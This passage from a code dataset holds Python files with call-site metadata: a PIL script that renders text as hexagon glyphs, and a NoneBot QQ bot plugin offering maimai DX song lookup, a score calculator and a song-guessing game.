20, 198, 69), 'numpy.repeat', 'numpy.repeat', (), '', False, 'import numpy\n'), ((218, 8, 218, 52), 'numpy.vstack', 'numpy.vstack', ({(218, 21, 218, 51): '(E_values, Re_values, Im_values)'}, {}), '((E_values, Re_values, Im_values))', False, 'import numpy\n'), ((241, 31, 241, 183), 'data.merge_spectra', 'data.merge_spectra', (), '', False, 'import data\n'), ((264, 39, 264, 76), 'numpy.vstack', 'numpy.vstack', ({(264, 52, 264, 75): '(ASF_Data, ASF_Data[-1])'}, {}), '((ASF_Data, ASF_Data[-1]))', False, 'import numpy\n'), ((85, 12, 85, 34), 'numpy.where', 'numpy.where', ({(85, 24, 85, 33): '(orders >= 0)'}, {}), '(orders >= 0)', False, 'import numpy\n'), ((92, 12, 92, 35), 'numpy.where', 'numpy.where', ({(92, 24, 92, 34): '(orders <= -3)'}, {}), '(orders <= -3)', False, 'import numpy\n'), ((130, 155, 130, 204), 'numpy.absolute', 'numpy.absolute', ({(130, 170, 130, 203): '((X2 - E + 1 * (X2 == E)) / (X1 - E + 1 * (X1 == E)))'}, {}), '((X2 - E + 1 * (X2 == E)) / (X1 - E + 1 * (X1 == E)))', False, 'import numpy\n'), ((134, 36, 134, 59), 'numpy.any', 'numpy.any', (), '', False, 'import numpy\n'), ((142, 113, 142, 144), 'numpy.absolute', 'numpy.absolute', ({(142, 128, 142, 143): '((X2 - XE) / (X1 - XE))'}, {}), '((X2 - XE) / (X1 - XE))', False, 'import numpy\n'), ((181, 27, 181, 46), 'numpy.sum', 'numpy.sum', ({(181, 37, 181, 45): 'improved'}, {}), '(improved)', False, 'import numpy\n'), ((240, 36, 240, 82), 'data.load_data', 'data.load_data', ({(240, 51, 240, 67): 'NearEdgeDataFile', (240, 69, 240, 81): 'load_options'}, {}), '(NearEdgeDataFile, load_options)', False, 'import data\n'), ((246, 57, 246, 114), 'numpy.vstack', 'numpy.vstack', ({(246, 70, 246, 113): '(Imaginary_Spectrum, Imaginary_Spectrum[-1])'}, {}), '((Imaginary_Spectrum, Imaginary_Spectrum[-1]))', False, 'import numpy\n'), ((247, 16, 247, 78), 'numpy.vstack', 'numpy.vstack', ({(247, 29, 247, 77): '(Full_E, Real_Spectrum, Imaginary_Spectrum_Values)'}, {}), '((Full_E, Real_Spectrum, Imaginary_Spectrum_Values))', False, 'import numpy\n'), ((129, 333, 129, 362), 'numpy.absolute', 'numpy.absolute', ({(129, 348, 129, 361): '((X2 + E) / (X1 + E))'}, {}), '((X2 + E) / (X1 + E))', False, 'import numpy\n'), ((78, 43, 78, 87), 'numpy.absolute', 'numpy.absolute', ({(78, 58, 78, 86): '(X[1:, :, :] + E) / (X[:-1, :, :] + E)'}, {}), '((X[1:, :, :] + E) / (X[:-1, :, :] + E))', False, 'import numpy\n'), ((82, 66, 82, 124), 'numpy.absolute', 'numpy.absolute', ({(82, 81, 82, 123): '(X[1:, :, (orders <= -2)] / X[:-1, :, (orders <= -2)])'}, {}), '(X[1:, :, (orders <= -2)] / X[:-1, :, (orders <= -2)])', False, 'import numpy\n'), ((128, 152, 128, 173), 'numpy.absolute', 'numpy.absolute', ({(128, 167, 128, 172): '(X2 / X1)'}, {}), '(X2 / X1)', False, 'import numpy\n'), ((199, 40, 199, 86), 'numpy.zeros', 'numpy.zeros', (), '', False, 'import numpy\n'), ((200, 15, 200, 55), 'numpy.vstack', 'numpy.vstack', ({(200, 28, 200, 54): '(new_points, new_points + 1)'}, {}), '((new_points, new_points + 1))', False, 'import numpy\n'), ((129, 152, 129, 173), 'numpy.absolute', 'numpy.absolute', ({(129, 167, 129, 172): '(X2 / X1)'}, {}), '(X2 / X1)', False, 'import numpy\n'), ((191, 19, 191, 38), 'numpy.sum', 'numpy.sum', ({(191, 29, 191, 37): 'improved'}, {}), '(improved)', False, 'import numpy\n')]
dominicschaff/random
random-images/hexxy.py
14a19b976a09c768ab8844b7cda237c17a92c9ae
from PIL import ImageDraw, Image from math import cos,sin,radians from random import randint import sys a = "a0A1b2B3c4C5d6D7e8E9f!F,g.G/h?H<i>I:j;J'k\"K\\l|L/m M\nn\tN@o#O$p%P^q&Q*r(R)s_S-t+T=u{U}v[V]w W x X y Y z Z" if len(a) > 128: print("TOO MANY CHARACTERS") sys.exit(1) # for i in a: # print("%s -> %d %d %d %d %d %d %d "%(i, # 1 if a.index(i) & 1 == 1 else 0, # 1 if a.index(i) & 2 == 2 else 0, # 1 if a.index(i) & 4 == 4 else 0, # 1 if a.index(i) & 8 == 8 else 0, # 1 if a.index(i) & 16 == 16 else 0, # 1 if a.index(i) & 32 == 32 else 0, # 1 if a.index(i) & 64 == 64 else 0, # )) # sys.exit(0) WHITE=(255,255,255) PINK=(217,154,197) BLUE=(103,170,249) BLACK=(0,0,0) img = Image.new('RGB', (2560,1600), BLACK) id = ImageDraw.Draw(img) def hex(offset, size): points = [] x,y = offset for angle in range(0, 360, 60): x += cos(radians(angle)) * size y += sin(radians(angle)) * size points.append((x, y)) return points def drawHex(id, sx,sy,s,c): ox = sx - cos(radians(120)) * s oy = sy - sin(radians(120)) * s id.polygon(hex((ox-s,oy-s*2),s), fill=BLUE if c & 1 == 1 else PINK) id.polygon(hex((ox+s,oy-s*2),s), fill=BLUE if c & 2 == 2 else PINK) id.polygon(hex((ox-s*2,oy),s), fill=BLUE if c & 4 == 4 else PINK) id.polygon(hex((ox,oy),s), fill=BLUE if c & 8 == 8 else PINK) id.polygon(hex((ox+s*2,oy),s), fill=BLUE if c & 16 == 16 else PINK) id.polygon(hex((ox-s,oy+s*2),s), fill=BLUE if c & 32 == 32 else PINK) id.polygon(hex((ox+s,oy+s*2),s), fill=BLUE if c & 64 == 64 else PINK) q = """This is a test 0123456789%""" s = 10 cutOff = int(2560/(s*7)) print (cutOff) x,y = 0,0 for c in q: drawHex(id, s*2 + x*s*7, s*3 + y*s*7, s, a.index(c)) x+=1 if x >= cutOff or c == "\n": x,y = 0,y+1 img.show()
[((28, 6, 28, 42), 'PIL.Image.new', 'Image.new', ({(28, 16, 28, 21): '"""RGB"""', (28, 23, 28, 34): '(2560, 1600)', (28, 36, 28, 41): 'BLACK'}, {}), "('RGB', (2560, 1600), BLACK)", False, 'from PIL import ImageDraw, Image\n'), ((29, 5, 29, 24), 'PIL.ImageDraw.Draw', 'ImageDraw.Draw', ({(29, 20, 29, 23): 'img'}, {}), '(img)', False, 'from PIL import ImageDraw, Image\n'), ((9, 4, 9, 15), 'sys.exit', 'sys.exit', ({(9, 13, 9, 14): '(1)'}, {}), '(1)', False, 'import sys\n'), ((36, 17, 36, 31), 'math.radians', 'radians', ({(36, 25, 36, 30): 'angle'}, {}), '(angle)', False, 'from math import cos, sin, radians\n'), ((37, 17, 37, 31), 'math.radians', 'radians', ({(37, 25, 37, 30): 'angle'}, {}), '(angle)', False, 'from math import cos, sin, radians\n'), ((42, 18, 42, 30), 'math.radians', 'radians', ({(42, 26, 42, 29): '(120)'}, {}), '(120)', False, 'from math import cos, sin, radians\n'), ((43, 18, 43, 30), 'math.radians', 'radians', ({(43, 26, 43, 29): '(120)'}, {}), '(120)', False, 'from math import cos, sin, radians\n')]
LonelyFantasy/Chiyuki-Bot
src/plugins/maimaidx.py
16a91b96661825c2a367a12c30d6a28ad13b95a9
import math from collections import defaultdict from typing import List, Dict, Any from nonebot import on_command, on_message, on_notice, on_regex, get_driver from nonebot.log import logger from nonebot.permission import Permission from nonebot.typing import T_State from nonebot.adapters import Event, Bot from nonebot.adapters.cqhttp import Message, MessageSegment, GroupMessageEvent, PrivateMessageEvent from src.libraries.maimaidx_guess import GuessObject from src.libraries.tool import hash from src.libraries.maimaidx_music import * from src.libraries.image import * from src.libraries.maimai_best_40 import generate import requests import json import random import time import re from urllib import parse driver = get_driver() @driver.on_startup def _(): logger.info("Load help text successfully") help_text: dict = get_driver().config.help_text help_text['mai'] = ('查看舞萌相关功能', """桜千雪です、よろしく。 可用命令如下: 今日舞萌 查看今天的舞萌运势 XXXmaimaiXXX什么 随机一首歌 随个[dx/标准][绿黄红紫白]<难度> 随机一首指定条件的乐曲 查歌<乐曲标题的一部分> 查询符合条件的乐曲 [绿黄红紫白]id<歌曲编号> 查询乐曲信息或谱面信息 <歌曲别名>是什么歌 查询乐曲别名对应的乐曲 定数查歌 <定数> 查询定数对应的乐曲 定数查歌 <定数下限> <定数上限> 分数线 <难度+歌曲id> <分数线> 详情请输入“分数线 帮助”查看""") def song_txt(music: Music): return Message([ { "type": "text", "data": { "text": f"{music.id}. {music.title}\n" } }, { "type": "image", "data": { "file": f"https://www.diving-fish.com/covers/{music.id}.jpg" } }, { "type": "text", "data": { "text": f"\n{'/'.join(music.level)}" } } ]) def inner_level_q(ds1, ds2=None): result_set = [] diff_label = ['Bas', 'Adv', 'Exp', 'Mst', 'ReM'] if ds2 is not None: music_data = total_list.filter(ds=(ds1, ds2)) else: music_data = total_list.filter(ds=ds1) for music in music_data: for i in music.diff: result_set.append((music['id'], music['title'], music['ds'][i], diff_label[i], music['level'][i])) return result_set inner_level = on_command('inner_level ', aliases={'定数查歌 '}) @inner_level.handle() async def _(bot: Bot, event: Event, state: T_State): argv = str(event.get_message()).strip().split(" ") if len(argv) > 2 or len(argv) == 0: await inner_level.finish("命令格式为\n定数查歌 <定数>\n定数查歌 <定数下限> <定数上限>") return if len(argv) == 1: result_set = inner_level_q(float(argv[0])) else: result_set = inner_level_q(float(argv[0]), float(argv[1])) if len(result_set) > 50: await inner_level.finish("数据超出 50 条,请尝试缩小查询范围") return s = "" for elem in result_set: s += f"{elem[0]}. {elem[1]} {elem[3]} {elem[4]}({elem[2]})\n" await inner_level.finish(s.strip()) spec_rand = on_regex(r"^随个(?:dx|sd|标准)?[绿黄红紫白]?[0-9]+\+?") @spec_rand.handle() async def _(bot: Bot, event: Event, state: T_State): level_labels = ['绿', '黄', '红', '紫', '白'] regex = "随个((?:dx|sd|标准))?([绿黄红紫白]?)([0-9]+\+?)" res = re.match(regex, str(event.get_message()).lower()) try: if res.groups()[0] == "dx": tp = ["DX"] elif res.groups()[0] == "sd" or res.groups()[0] == "标准": tp = ["SD"] else: tp = ["SD", "DX"] level = res.groups()[2] if res.groups()[1] == "": music_data = total_list.filter(level=level, type=tp) else: music_data = total_list.filter(level=level, diff=['绿黄红紫白'.index(res.groups()[1])], type=tp) await spec_rand.send(song_txt(music_data.random())) except Exception as e: print(e) await spec_rand.finish("随机命令错误,请检查语法") mr = on_regex(r".*maimai.*什么") @mr.handle() async def _(bot: Bot, event: Event, state: T_State): await mr.finish(song_txt(total_list.random())) search_music = on_regex(r"^查歌.+") @search_music.handle() async def _(bot: Bot, event: Event, state: T_State): regex = "查歌(.+)" name = re.match(regex, str(event.get_message())).groups()[0].strip() if name == "": return res = total_list.filter(title_search=name) await search_music.finish(Message([ {"type": "text", "data": { "text": f"{music['id']}. {music['title']}\n" }} for music in res])) query_chart = on_regex(r"^([绿黄红紫白]?)id([0-9]+)") @query_chart.handle() async def _(bot: Bot, event: Event, state: T_State): regex = "([绿黄红紫白]?)id([0-9]+)" groups = re.match(regex, str(event.get_message())).groups() level_labels = ['绿', '黄', '红', '紫', '白'] if groups[0] != "": try: level_index = level_labels.index(groups[0]) level_name = ['Basic', 'Advanced', 'Expert', 'Master', 'Re: MASTER'] name = groups[1] music = total_list.by_id(name) chart = music['charts'][level_index] ds = music['ds'][level_index] level = music['level'][level_index] file = f"https://www.diving-fish.com/covers/{music['id']}.jpg" if len(chart['notes']) == 4: msg = f'''{level_name[level_index]} {level}({ds}) TAP: {chart['notes'][0]} HOLD: {chart['notes'][1]} SLIDE: {chart['notes'][2]} BREAK: {chart['notes'][3]} 谱师: {chart['charter']} ''' else: msg = f'''{level_name[level_index]} {level}({ds}) TAP: {chart['notes'][0]} HOLD: {chart['notes'][1]} SLIDE: {chart['notes'][2]} TOUCH: {chart['notes'][3]} BREAK: {chart['notes'][4]} 谱师: {chart['charter']} ''' await query_chart.send(Message([ { "type": "text", "data": { "text": f"{music['id']}. {music['title']}\n" } }, { "type": "image", "data": { "file": f"{file}" } }, { "type": "text", "data": { "text": msg } } ])) except Exception: await query_chart.send("未找到该谱面") else: name = groups[1] music = total_list.by_id(name) try: file = f"https://www.diving-fish.com/covers/{music['id']}.jpg" await query_chart.send(Message([ { "type": "text", "data": { "text": f"{music['id']}. {music['title']}\n" } }, { "type": "image", "data": { "file": f"{file}" } }, { "type": "text", "data": { "text": f"艺术家: {music['basic_info']['artist']}\n分类: {music['basic_info']['genre']}\nBPM: {music['basic_info']['bpm']}\n版本: {music['basic_info']['from']}\n难度: {'/'.join(music['level'])}" } } ])) except Exception: await query_chart.send("未找到该乐曲") wm_list = ['拼机', '推分', '越级', '下埋', '夜勤', '练底力', '练手法', '打旧框', '干饭', '抓绝赞', '收歌'] jrwm = on_command('今日舞萌', aliases={'今日mai'}) @jrwm.handle() async def _(bot: Bot, event: Event, state: T_State): qq = int(event.get_user_id()) h2 = hash(qq) h = h2 rp = h % 100 wm_value = [] for i in range(11): wm_value.append(h & 3) h >>= 2 s = f"今日人品值:{rp}\n" for i in range(11): if wm_value[i] == 3: s += f'宜 {wm_list[i]}\n' elif wm_value[i] == 0: s += f'忌 {wm_list[i]}\n' s += "千雪提醒您:打机时不要大力拍打或滑动哦\n今日推荐歌曲:" music = total_list[h2 % len(total_list)] await jrwm.finish(Message([ {"type": "text", "data": {"text": s}} ] + song_txt(music))) music_aliases = defaultdict(list) f = open('src/static/aliases.csv', 'r', encoding='utf-8') tmp = f.readlines() f.close() for t in tmp: arr = t.strip().split('\t') for i in range(len(arr)): if arr[i] != "": music_aliases[arr[i].lower()].append(arr[0]) find_song = on_regex(r".+是什么歌") @find_song.handle() async def _(bot: Bot, event: Event, state: T_State): regex = "(.+)是什么歌" name = re.match(regex, str(event.get_message())).groups()[0].strip().lower() if name not in music_aliases: await find_song.finish("未找到此歌曲\n舞萌 DX 歌曲别名收集计划:https://docs.qq.com/sheet/DSXhaUXVsRlhxRmtJ") return result_set = music_aliases[name] if len(result_set) == 1: music = total_list.by_title(result_set[0]) await find_song.finish(Message([{"type": "text", "data": {"text": "您要找的是不是"}}] + song_txt(music))) else: s = '\n'.join(result_set) await find_song.finish(f"您要找的可能是以下歌曲中的其中一首:\n{ s }") query_score = on_command('分数线') query_score_text = '''此功能为查找某首歌分数线设计。 命令格式:分数线 <难度+歌曲id> <分数线> 例如:分数线 白337 100 命令将返回分数线允许的 TAP GREAT 容错以及 BREAK 50落等价的 TAP GREAT 数。 以下为 TAP GREAT 的对应表: GREAT/GOOD/MISS TAP 1/2.5/5 HOLD 2/5/10 SLIDE 3/7.5/15 TOUCH 1/2.5/5 BREAK 5/12.5/25(外加200落)''' query_score_mes = Message([{ "type": "image", "data": { "file": f"base64://{str(image_to_base64(text_to_image(query_score_text)), encoding='utf-8')}" } }]) @query_score.handle() async def _(bot: Bot, event: Event, state: T_State): r = "([绿黄红紫白])(?:id)?([0-9]+)" argv = str(event.get_message()).strip().split(" ") if len(argv) == 1 and argv[0] == '帮助': await query_score.send(query_score_mes) elif len(argv) == 2: try: grp = re.match(r, argv[0]).groups() level_labels = ['绿', '黄', '红', '紫', '白'] level_labels2 = ['Basic', 'Advanced', 'Expert', 'Master', 'Re:MASTER'] level_index = level_labels.index(grp[0]) chart_id = grp[1] line = float(argv[1]) music = total_list.by_id(chart_id) chart: Dict[Any] = music['charts'][level_index] tap = int(chart['notes'][0]) slide = int(chart['notes'][2]) hold = int(chart['notes'][1]) touch = int(chart['notes'][3]) if len(chart['notes']) == 5 else 0 brk = int(chart['notes'][-1]) total_score = 500 * tap + slide * 1500 + hold * 1000 + touch * 500 + brk * 2500 break_bonus = 0.01 / brk break_50_reduce = total_score * break_bonus / 4 reduce = 101 - line if reduce <= 0 or reduce >= 101: raise ValueError await query_chart.send(f'''{music['title']} {level_labels2[level_index]} 分数线 {line}% 允许的最多 TAP GREAT 数量为 {(total_score * reduce / 10000):.2f}(每个-{10000 / total_score:.4f}%), BREAK 50落(一共{brk}个)等价于 {(break_50_reduce / 100):.3f} 个 TAP GREAT(-{break_50_reduce / total_score * 100:.4f}%)''') except Exception: await query_chart.send("格式错误或未找到乐曲,输入“分数线 帮助”以查看帮助信息") best_40_pic = on_command('b40') @best_40_pic.handle() async def _(bot: Bot, event: Event, state: T_State): username = str(event.get_message()).strip() print(event.message_id) if username == "": payload = {'qq': str(event.get_user_id())} else: payload = {'username': username} img, success = await generate(payload) if success == 400: await best_40_pic.send("未找到此玩家,请确保此玩家的用户名和查分器中的用户名相同。") elif success == 403: await best_40_pic.send("该用户禁止了其他人获取数据。") else: await best_40_pic.send(Message([ MessageSegment.reply(event.message_id), MessageSegment.image(f"base64://{str(image_to_base64(img), encoding='utf-8')}") ])) disable_guess_music = on_command('猜歌设置', priority=0) @disable_guess_music.handle() async def _(bot: Bot, event: Event): if event.message_type != "group": return arg = str(event.get_message()) group_members = await bot.get_group_member_list(group_id=event.group_id) for m in group_members: if m['user_id'] == event.user_id: break su = get_driver().config.superusers if m['role'] != 'owner' and m['role'] != 'admin' and str(m['user_id']) not in su: await disable_guess_music.finish("只有管理员可以设置猜歌") return db = get_driver().config.db c = await db.cursor() if arg == '启用': await c.execute(f'update guess_table set enabled=1 where group_id={event.group_id}') elif arg == '禁用': await c.execute(f'update guess_table set enabled=0 where group_id={event.group_id}') else: await disable_guess_music.finish("请输入 猜歌设置 启用/禁用") await db.commit() await disable_guess_music.finish("设置成功") guess_dict: Dict[Tuple[str, str], GuessObject] = {} guess_cd_dict: Dict[Tuple[str, str], float] = {} guess_music = on_command('猜歌', priority=0) async def guess_music_loop(bot: Bot, event: Event, state: T_State): await asyncio.sleep(10) guess: GuessObject = state["guess_object"] if guess.is_end: return cycle = state["cycle"] if cycle < 6: asyncio.create_task(bot.send(event, f"{cycle + 1}/7 这首歌" + guess.guess_options[cycle])) else: asyncio.create_task(bot.send(event, Message([ MessageSegment.text("7/7 这首歌封面的一部分是:"), MessageSegment.image("base64://" + str(guess.b64image, encoding="utf-8")), MessageSegment.text("答案将在 30 秒后揭晓") ]))) asyncio.create_task(give_answer(bot, event, state)) return state["cycle"] += 1 asyncio.create_task(guess_music_loop(bot, event, state)) async def give_answer(bot: Bot, event: Event, state: T_State): await asyncio.sleep(30) guess: GuessObject = state["guess_object"] if guess.is_end: return asyncio.create_task(bot.send(event, Message([MessageSegment.text("答案是:" + f"{guess.music['id']}. {guess.music['title']}\n"), MessageSegment.image(f"https://www.diving-fish.com/covers/{guess.music['id']}.jpg")]))) del guess_dict[state["k"]] @guess_music.handle() async def _(bot: Bot, event: Event, state: T_State): mt = event.message_type k = (mt, event.user_id if mt == "private" else event.group_id) if mt == "group": gid = event.group_id db = get_driver().config.db c = await db.cursor() await c.execute(f"select * from guess_table where group_id={gid}") data = await c.fetchone() if data is None: await c.execute(f'insert into guess_table values ({gid}, 1)') elif data[1] == 0: await guess_music.send("本群已禁用猜歌") return if k in guess_dict: if k in guess_cd_dict and time.time() > guess_cd_dict[k] - 400: # 如果已经过了 200 秒则自动结束上一次 del guess_dict[k] else: await guess_music.send("当前已有正在进行的猜歌") return whitelists = get_driver().config.whitelists if not (mt == "group" and gid in whitelists): if len(guess_dict) >= 5: await guess_music.finish("千雪有点忙不过来了。现在正在猜的群有点多,晚点再试试如何?") return if k in guess_cd_dict and time.time() < guess_cd_dict[k]: await guess_music.finish(f"已经猜过啦,下次猜歌会在 {time.strftime('%H:%M', time.localtime(guess_cd_dict[k]))} 可用噢") return guess = GuessObject() guess_dict[k] = guess state["k"] = k state["guess_object"] = guess state["cycle"] = 0 guess_cd_dict[k] = time.time() + 600 await guess_music.send("我将从热门乐曲中选择一首歌,并描述它的一些特征,请输入歌曲的【id】、【歌曲标题】或【歌曲标题中 5 个以上连续的字符】进行猜歌(DX乐谱和标准乐谱视为两首歌)。猜歌时查歌等其他命令依然可用。\n警告:这个命令可能会很刷屏,管理员可以使用【猜歌设置】指令进行设置。") asyncio.create_task(guess_music_loop(bot, event, state)) guess_music_solve = on_message(priority=20) @guess_music_solve.handle() async def _(bot: Bot, event: Event, state: T_State): mt = event.message_type k = (mt, event.user_id if mt == "private" else event.group_id) if k not in guess_dict: return ans = str(event.get_message()) guess = guess_dict[k] # await guess_music_solve.send(ans + "|" + guess.music['id']) if ans == guess.music['id'] or (ans.lower() == guess.music['title'].lower()) or (len(ans) >= 5 and ans.lower() in guess.music['title'].lower()): guess.is_end = True del guess_dict[k] await guess_music_solve.finish(Message([ MessageSegment.reply(event.message_id), MessageSegment.text("猜对了,答案是:" + f"{guess.music['id']}. {guess.music['title']}\n"), MessageSegment.image(f"https://www.diving-fish.com/covers/{guess.music['id']}.jpg") ]))
[((25, 9, 25, 21), 'nonebot.get_driver', 'get_driver', ({}, {}), '()', False, 'from nonebot import on_command, on_message, on_notice, on_regex, get_driver\n'), ((81, 14, 81, 67), 'nonebot.on_command', 'on_command', (), '', False, 'from nonebot import on_command, on_message, on_notice, on_regex, get_driver\n'), ((103, 12, 103, 76), 'nonebot.on_regex', 'on_regex', ({(103, 21, 103, 75): '"""^随个(?:dx|sd|标准)?[绿黄红紫白]?[0-9]+\\\\+?"""'}, {}), "('^随个(?:dx|sd|标准)?[绿黄红紫白]?[0-9]+\\\\+?')", False, 'from nonebot import on_command, on_message, on_notice, on_regex, get_driver\n'), ((129, 5, 129, 34), 'nonebot.on_regex', 'on_regex', ({(129, 14, 129, 33): '""".*maimai.*什么"""'}, {}), "('.*maimai.*什么')", False, 'from nonebot import on_command, on_message, on_notice, on_regex, get_driver\n'), ((137, 15, 137, 37), 'nonebot.on_regex', 'on_regex', ({(137, 24, 137, 36): '"""^查歌.+"""'}, {}), "('^查歌.+')", False, 'from nonebot import on_command, on_message, on_notice, on_regex, get_driver\n'), ((154, 14, 154, 58), 'nonebot.on_regex', 'on_regex', ({(154, 23, 154, 57): '"""^([绿黄红紫白]?)id([0-9]+)"""'}, {}), "('^([绿黄红紫白]?)id([0-9]+)')", False, 'from nonebot import on_command, on_message, on_notice, on_regex, get_driver\n'), ((243, 7, 243, 56), 'nonebot.on_command', 'on_command', (), '', False, 'from nonebot import on_command, on_message, on_notice, on_regex, get_driver\n'), ((269, 16, 269, 33), 'collections.defaultdict', 'defaultdict', ({(269, 28, 269, 32): 'list'}, {}), '(list)', False, 'from collections import defaultdict\n'), ((280, 12, 280, 39), 'nonebot.on_regex', 'on_regex', ({(280, 21, 280, 38): '""".+是什么歌"""'}, {}), "('.+是什么歌')", False, 'from nonebot import on_command, on_message, on_notice, on_regex, get_driver\n'), ((299, 14, 299, 37), 'nonebot.on_command', 'on_command', ({(299, 25, 299, 36): '"""分数线"""'}, {}), "('分数线')", False, 'from nonebot import on_command, on_message, on_notice, on_regex, get_driver\n'), ((353, 14, 353, 31), 'nonebot.on_command', 'on_command', ({(353, 25, 353, 30): '"""b40"""'}, {}), "('b40')", False, 'from nonebot import on_command, on_message, on_notice, on_regex, get_driver\n'), ((377, 22, 377, 60), 'nonebot.on_command', 'on_command', (), '', False, 'from nonebot import on_command, on_message, on_notice, on_regex, get_driver\n'), ((407, 14, 407, 46), 'nonebot.on_command', 'on_command', (), '', False, 'from nonebot import on_command, on_message, on_notice, on_regex, get_driver\n'), ((479, 20, 479, 43), 'nonebot.on_message', 'on_message', (), '', False, 'from nonebot import on_command, on_message, on_notice, on_regex, get_driver\n'), ((30, 4, 30, 46), 'nonebot.log.logger.info', 'logger.info', ({(30, 16, 30, 45): '"""Load help text successfully"""'}, {}), "('Load help text successfully')", False, 'from nonebot.log import logger\n'), ((249, 9, 249, 17), 'src.libraries.tool.hash', 'hash', ({(249, 14, 249, 16): 'qq'}, {}), '(qq)', False, 'from src.libraries.tool import hash\n'), ((469, 12, 469, 25), 'src.libraries.maimaidx_guess.GuessObject', 'GuessObject', ({}, {}), '()', False, 'from src.libraries.maimaidx_guess import GuessObject\n'), ((364, 25, 364, 42), 'src.libraries.maimai_best_40.generate', 'generate', ({(364, 34, 364, 41): 'payload'}, {}), '(payload)', False, 'from src.libraries.maimai_best_40 import generate\n'), ((474, 23, 474, 34), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n'), ((31, 22, 31, 34), 'nonebot.get_driver', 'get_driver', ({}, {}), '()', False, 'from nonebot import on_command, on_message, on_notice, on_regex, get_driver\n'), ((147, 30, 151, 33), 'nonebot.adapters.cqhttp.Message', 'Message', ({(147, 38, 151, 32): '[{\'type\': \'text\', \'data\': {\'text\': f"{music[\'id\']}. {music[\'title\']}\\n"}} for\n music in res]'}, {}), '([{\'type\': \'text\', \'data\': {\'text\':\n f"{music[\'id\']}. {music[\'title\']}\\n"}} for music in res])', False, 'from nonebot.adapters.cqhttp import Message, MessageSegment, GroupMessageEvent, PrivateMessageEvent\n'), ((389, 9, 389, 21), 'nonebot.get_driver', 'get_driver', ({}, {}), '()', False, 'from nonebot import on_command, on_message, on_notice, on_regex, get_driver\n'), ((393, 9, 393, 21), 'nonebot.get_driver', 'get_driver', ({}, {}), '()', False, 'from nonebot import on_command, on_message, on_notice, on_regex, get_driver\n'), ((461, 17, 461, 29), 'nonebot.get_driver', 'get_driver', ({}, {}), '()', False, 'from nonebot import on_command, on_message, on_notice, on_regex, get_driver\n'), ((445, 13, 445, 25), 'nonebot.get_driver', 'get_driver', ({}, {}), '()', False, 'from nonebot import on_command, on_message, on_notice, on_regex, get_driver\n'), ((466, 34, 466, 45), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n'), ((189, 35, 208, 14), 'nonebot.adapters.cqhttp.Message', 'Message', ({(189, 43, 208, 13): '[{\'type\': \'text\', \'data\': {\'text\': f"{music[\'id\']}. {music[\'title\']}\\n"}},\n {\'type\': \'image\', \'data\': {\'file\': f\'{file}\'}}, {\'type\': \'text\', \'data\':\n {\'text\': msg}}]'}, {}), '([{\'type\': \'text\', \'data\': {\'text\':\n f"{music[\'id\']}. {music[\'title\']}\\n"}}, {\'type\': \'image\', \'data\': {\n \'file\': f\'{file}\'}}, {\'type\': \'text\', \'data\': {\'text\': msg}}])', False, 'from nonebot.adapters.cqhttp import Message, MessageSegment, GroupMessageEvent, PrivateMessageEvent\n'), ((435, 49, 435, 135), 'nonebot.adapters.cqhttp.MessageSegment.text', 'MessageSegment.text', ({(435, 69, 435, 134): '(\'答案是:\' + f"{guess.music[\'id\']}. {guess.music[\'title\']}\\n")'}, {}), '(\'答案是:\' + f"{guess.music[\'id\']}. {guess.music[\'title\']}\\n")', False, 'from nonebot.adapters.cqhttp import Message, MessageSegment, GroupMessageEvent, PrivateMessageEvent\n'), ((435, 137, 435, 220), 'nonebot.adapters.cqhttp.MessageSegment.image', 'MessageSegment.image', ({(435, 158, 435, 219): 'f"""https://www.diving-fish.com/covers/{guess.music[\'id\']}.jpg"""'}, {}), '(\n f"https://www.diving-fish.com/covers/{guess.music[\'id\']}.jpg")', False, 'from nonebot.adapters.cqhttp import Message, MessageSegment, GroupMessageEvent, PrivateMessageEvent\n'), ((455, 38, 455, 49), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n'), ((327, 18, 327, 38), 're.match', 're.match', ({(327, 27, 327, 28): 'r', (327, 30, 327, 37): 'argv[0]'}, {}), '(r, argv[0])', False, 'import re\n'), ((420, 12, 420, 72), 'nonebot.adapters.cqhttp.MessageSegment.text', 'MessageSegment.text', ({(420, 32, 420, 71): '"""7/7 这首歌封面的一部分是:"""'}, {}), "('7/7 这首歌封面的一部分是:')", False, 'from nonebot.adapters.cqhttp import Message, MessageSegment, GroupMessageEvent, PrivateMessageEvent\n'), ((422, 12, 422, 63), 'nonebot.adapters.cqhttp.MessageSegment.text', 'MessageSegment.text', ({(422, 32, 422, 62): '"""答案将在 30 秒后揭晓"""'}, {}), "('答案将在 30 秒后揭晓')", False, 'from nonebot.adapters.cqhttp import Message, MessageSegment, GroupMessageEvent, PrivateMessageEvent\n'), ((495, 12, 495, 50), 'nonebot.adapters.cqhttp.MessageSegment.reply', 'MessageSegment.reply', ({(495, 33, 495, 49): 'event.message_id'}, {}), '(event.message_id)', False, 'from nonebot.adapters.cqhttp import Message, MessageSegment, GroupMessageEvent, PrivateMessageEvent\n'), ((496, 12, 496, 110), 'nonebot.adapters.cqhttp.MessageSegment.text', 'MessageSegment.text', ({(496, 32, 496, 109): '(\'猜对了,答案是:\' + f"{guess.music[\'id\']}. {guess.music[\'title\']}\\n")'}, {}), '(\'猜对了,答案是:\' +\n f"{guess.music[\'id\']}. {guess.music[\'title\']}\\n")', False, 'from nonebot.adapters.cqhttp import Message, MessageSegment, GroupMessageEvent, PrivateMessageEvent\n'), ((497, 12, 497, 95), 'nonebot.adapters.cqhttp.MessageSegment.image', 'MessageSegment.image', ({(497, 33, 497, 94): 'f"""https://www.diving-fish.com/covers/{guess.music[\'id\']}.jpg"""'}, {}), '(\n f"https://www.diving-fish.com/covers/{guess.music[\'id\']}.jpg")', False, 'from nonebot.adapters.cqhttp import Message, MessageSegment, GroupMessageEvent, PrivateMessageEvent\n'), ((371, 12, 371, 50), 'nonebot.adapters.cqhttp.MessageSegment.reply', 'MessageSegment.reply', ({(371, 33, 371, 49): 'event.message_id'}, {}), '(event.message_id)', False, 'from nonebot.adapters.cqhttp import Message, MessageSegment, GroupMessageEvent, PrivateMessageEvent\n'), ((467, 100, 467, 132), 'time.localtime', 'time.localtime', ({(467, 115, 467, 131): 'guess_cd_dict[k]'}, {}), '(guess_cd_dict[k])', False, 'import time\n')]
hsgwa/trace_analysis
trace_analysis/trace_analysis/architecture/interface.py
16169f84e838af5202e2be8f4883dfca5bc7f592
